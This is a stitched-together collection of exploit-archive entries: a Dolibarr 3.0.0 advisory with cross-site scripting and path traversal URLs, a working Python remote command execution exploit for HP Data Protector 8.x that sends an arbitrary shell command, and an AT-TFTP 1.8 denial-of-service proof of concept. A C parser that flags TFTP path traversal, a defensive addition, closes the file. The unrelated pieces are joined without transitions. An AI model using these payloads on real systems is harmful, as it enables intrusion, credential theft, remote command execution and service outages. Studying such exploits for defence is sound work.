The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Dolibarr 3.0.0 is vulnerable; other versions may also be affected.

http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
            
#!/usr/bin/python

# Exploit Title: HP-Data-Protector-8.x Remote command execution.
# Google Dork: -
# Date: 30/01/2015
# Exploit Author: Juttikhun Khamchaiyaphum
# Vendor Homepage: https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818
# Software Link: http://www8.hp.com/th/en/software-solutions/data-protector-backup-recovery-software/
# Version: 8.x
# Tested on: IA64 HP Server Rx3600
# CVE : CVE-2014-2623
# Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. "uname -m">"

import socket
import struct
import sys

def exploit(host, port, command):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        print "[+] Target connected."

        OFFSET_DEC_START = 133
        OFFSET_DEC = (OFFSET_DEC_START + len(command))
        # print "OFFSET_DEC_START:" + str(OFFSET_DEC_START)
        # print "len(command)" + str(len(command))
        # print "OFFSET_DEC" + str(OFFSET_DEC)
        OFFSET_HEX = "%x" % OFFSET_DEC
        # print "OFFSET_HEX" + str(OFFSET_HEX)
        OFFSET_USE = chr(OFFSET_DEC)
        # print "Command Length: " + str(len(command))
        PACKET_DATA = "\x00\x00\x00"+\
        OFFSET_USE+\
        "\x20\x32\x00\x20\x73\x73\x73\x73\x73\x73\x00\x20\x30" + \
        "\x00\x20\x54\x45\x53\x54\x45\x52\x00\x20\x74\x65\x73\x74\x65\x72\x00" + \
        "\x20\x43\x00\x20\x32\x30\x00\x20\x74\x65\x73\x65\x72\x74\x65\x73\x74" + \
        "\x2E\x65\x78\x65\x00\x20\x72\x65\x73\x65\x61\x72\x63\x68\x00\x20\x2F" + \
        "\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75" + \
        "\x6C\x6C\x00\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x00\x20\x30\x00" + \
        "\x20\x32\x00\x20\x75\x74\x69\x6C\x6E\x73\x2F\x64\x65\x74\x61\x63\x68" + \
        "\x00\x20\x2D\x64\x69\x72\x20\x2F\x62\x69\x6E\x20\x2D\x63\x6F\x6D\x20" + \
        " %s\x00" %command

        # Send payload to target
        print "[+] Sending PACKET_DATA"
        sock.sendall(PACKET_DATA)

        # Parse the response back
        print "[*] Result:"
        while True:
            response = sock.recv(2048)
            if not response: break
            print response

    except Exception as ex:
        print >> sys.stderr, "[-] Socket error: \n\t%s" % ex
        exit(-3)
    sock.close()

if __name__ == "__main__":
    try:
        target = sys.argv[1]
        port = int(sys.argv[2])
        command = sys.argv[3]
        exploit(target, port, command)
    except IndexError:
         print("Usage: hp_data_protector_8_x.py <target ip> <port> <command e.g. \"uname -m\">")
    exit(0)
            
source: https://www.securityfocus.com/bid/47561/info

AT-TFTP is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

AT-TFTP 1.8 is affected; other versions may also be vulnerable. 

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference : 
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

addr = (host, port)

data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))
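The datagram the PoC sends is a TFTP read request (opcode 1) for a filename that climbs out of the served directory. The parser below, added here and not part of SecPod's PoC, decodes an RRQ/WRQ into opcode, filename and transfer mode, rejects truncated or unterminated packets, and flags the path traversal a TFTP server must refuse before touching the filesystem; the sample packet is constructed to match the bytes above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define TFTP_RRQ 1
#define TFTP_WRQ 2

struct tftp_req {
    int  opcode;
    char filename[256];
    char mode[32];
    int  traversal;   /* 1 if the filename escapes the served directory */
};

/* 1 if the name is absolute or contains a ".." path component. */
static int tftp_path_is_unsafe(const char *name)
{
    if (name[0] == '/' || name[0] == '\\')
        return 1;
    const char *p = name;
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/' && *p != '\\')
            p++;
        if (p - seg == 2 && seg[0] == '.' && seg[1] == '.')
            return 1;
        if (*p)
            p++;
    }
    return 0;
}

/* Copy the NUL-terminated field starting at pkt[*off] into dst.
 * Returns 0 on success, -1 if no terminator is inside the packet or the
 * field does not fit in dst. */
static int tftp_read_cstring(const uint8_t *pkt, size_t len, size_t *off,
                             char *dst, size_t dstlen)
{
    size_t start = *off, i = start;
    while (i < len && pkt[i] != 0)
        i++;
    if (i >= len || i - start >= dstlen)
        return -1;
    memcpy(dst, pkt + start, i - start);
    dst[i - start] = '\0';
    *off = i + 1;
    return 0;
}

/* Parse an RRQ/WRQ packet; returns 0 on success, -1 on malformed input. */
int tftp_parse_request(const uint8_t *pkt, size_t len, struct tftp_req *req)
{
    memset(req, 0, sizeof(*req));
    if (len < 4)                          /* opcode + at least two NULs */
        return -1;
    req->opcode = (pkt[0] << 8) | pkt[1];
    if (req->opcode != TFTP_RRQ && req->opcode != TFTP_WRQ)
        return -1;
    size_t off = 2;
    if (tftp_read_cstring(pkt, len, &off, req->filename, sizeof req->filename))
        return -1;
    if (tftp_read_cstring(pkt, len, &off, req->mode, sizeof req->mode))
        return -1;
    if (strcasecmp(req->mode, "netascii") && strcasecmp(req->mode, "octet")
        && strcasecmp(req->mode, "mail"))
        return -1;                        /* RFC 1350 allows only these modes */
    req->traversal = tftp_path_is_unsafe(req->filename);
    return 0;
}

/* Constructed sample: the same 29 bytes the PoC above sends
 * (RRQ, "../../../boot.ini", mode "netascii"). */
static const uint8_t sample_rrq[] =
    "\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f"
    "\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00";

int main(void)
{
    struct tftp_req req;
    if (tftp_parse_request(sample_rrq, sizeof(sample_rrq) - 1, &req) != 0) {
        puts("malformed request");
        return 1;
    }
    printf("opcode=%d file=%s mode=%s traversal=%d\n",
           req.opcode, req.filename, req.mode, req.traversal);
    return req.traversal ? 2 : 0;
}
```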